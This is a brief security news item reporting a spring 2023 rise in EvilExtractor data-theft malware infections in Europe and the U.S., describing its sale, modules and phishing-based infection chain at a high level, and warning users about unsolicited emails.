Security News > 2023 > April > EvilExtractor malware activity spikes in Europe and the U.S.
Researchers are seeing a rise in attacks spreading the EvilExtractor data theft tool, used to steal users' sensitive data in Europe and the U.S. EvilExtractor is sold by a company named Kodex for $59/month, featuring seven attack modules, including ransomware, credential extraction, and Windows Defender bypassing.
While marketed as a legitimate tool, BleepingComputer was told that EvilExtractor is primarily promoted to threat actors on hacking forums.
Based on attack stats collected by the cybersecurity company, the deployment of EvilExtractor spiked in March 2023, with most infections coming from a linked phishing campaign.
When the target opens the file, a PyInstaller file is executed and launches a.NET loader that uses a base64-encoded PowerShell script to launch an EvilExtractor executable.
The EvilExtractor data-stealing module will download three additional Python components named "KK2023.zip," "Confirm.zip," and "MnMs.zip."
In the wild detections indicate that EvilExtractor is gaining traction in the cybercrime community, so users are advised to remain vigilant against unsolicited emails.